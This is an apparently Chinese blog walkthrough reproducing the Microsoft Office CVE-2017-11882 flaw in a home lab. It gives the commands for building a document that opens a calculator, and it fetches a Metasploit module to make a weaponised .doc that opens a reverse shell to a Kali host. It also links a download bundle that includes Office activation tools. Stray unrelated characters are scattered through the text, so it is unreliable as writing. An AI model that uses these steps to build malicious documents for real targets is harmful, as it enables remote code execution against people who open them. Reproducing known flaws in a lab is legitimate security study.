1.今天看到有復(fù)現(xiàn)的文章弱睦,看了好幾篇決定本地測(cè)試該漏洞
利用工具清單:
a) tcp反彈:kali 172.16.1.204
b) 安裝office2013的系統(tǒng):win7 172.16.253.4
1. Msf 用到的 Poc
2. office2013、激活工具
3. win7旗艦版ISO鏡像
以上工具已經(jīng)打包好锹漱,下載地址:
鏈接:http://pan.baidu.com/s/1o8635Om? 密碼:xl91
Microsoft Office再次爆出內(nèi)存破壞漏洞,CVEID?CVE-2017-11882,攻擊者可以利用此問(wèn)題潘拨,在當(dāng)前登錄用戶的上下文中執(zhí)行任意代碼。失敗的開發(fā)嘗試可能會(huì)導(dǎo)致拒絕服務(wù)條件饶号。
漏洞觸發(fā)的原理http://www.freebuf.com/articles/web/155304.html
受影響版本包括铁追,Office 2016、Office 2013茫船、Office 2010琅束、Office 2007的相關(guān)版本。
POC地址:https://github.com/Ridter/CVE-2017-11882/
分割符--------------------------------------------------------------------
上面都是廢話算谈,進(jìn)入正題
1涩禀、簡(jiǎn)單的生成彈計(jì)算器的doc文件
命令:python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
生成的doc文件直接打開就可以彈出計(jì)算器了
2、生成可以反彈shell的doc文件
這首先下載metasploit的攻擊模塊
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
之后移動(dòng)到下面這個(gè)目錄
mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat
接著啟動(dòng)metasploit
輸入
use exploit/windows/fileformat/office_ms17_11882
設(shè)置生成的文件名字
set filename bboysoul.doc
設(shè)置主機(jī)ip
set lhost 172.16.1.204
開始攻擊
exploit
回連成功然眼,shell
exit